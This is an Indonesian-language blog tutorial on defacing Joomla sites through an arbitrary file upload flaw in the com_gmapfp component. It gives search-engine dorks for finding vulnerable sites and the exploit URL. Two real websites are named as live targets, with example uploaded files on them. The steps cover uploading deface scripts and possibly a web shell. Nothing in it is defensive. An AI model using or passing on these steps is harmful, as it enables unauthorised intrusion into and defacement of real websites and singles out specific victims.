» » Tutorial - Cara Deface Exploit Com_gmapfp Arbitary File Upload

Tutorial - Cara Deface Exploit Com_gmapfp Arbitary File Upload

Edit

Keyword: Exploit Com_gmapfp Arbitary File Upload, Joomla Arbitary File Upload, Deface Com_gmapfp, Tebas Index Joomla, Cara Deface Joomla.

Dork :

inurl:"com_gmapfp"

inurl:/components/com_gmapfp/


Exploit : 

index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload


Live Target :

https://www.aeroclub-savoie.com/

https://www.turizam.mostar.ba


1. Pertama kalian bisa cari fresh target dengan dork diatas

2. Masukkan exploitnya di akhir domain / path

Contoh : 

  1. https://www.aeroclub-savoie.com/index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload
  2. https://www.aeroclub-savoie.com/[PATHNYA]/index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload

3. Jika muncul tempat upload sperti ini silahkan kalian upload file gambar / script deface kalian. Mungkin kalian juga bisa upload shell ( butuh bypass )

4.Kemudian kalian upload aja filenya, disini saya akan upload file pwn.gif
5.Jika ada alert seperti ini, itu tandanya file berhasil di upload

6. Cara akses filenya: 
target.com/images/gmapfp/filemu.jpg 
atau 
target.com/images/stories/gmapfp/filemu.jpg

Contoh:
- https://www.aeroclub-savoie.com/images/gmapfp/pwn.gif
- https://www.turizam.mostar.ba/images/stories/gmapfp/pwn.gif



Nakanosec

Artikel Terbaru

Artikel Terbaru
Loading...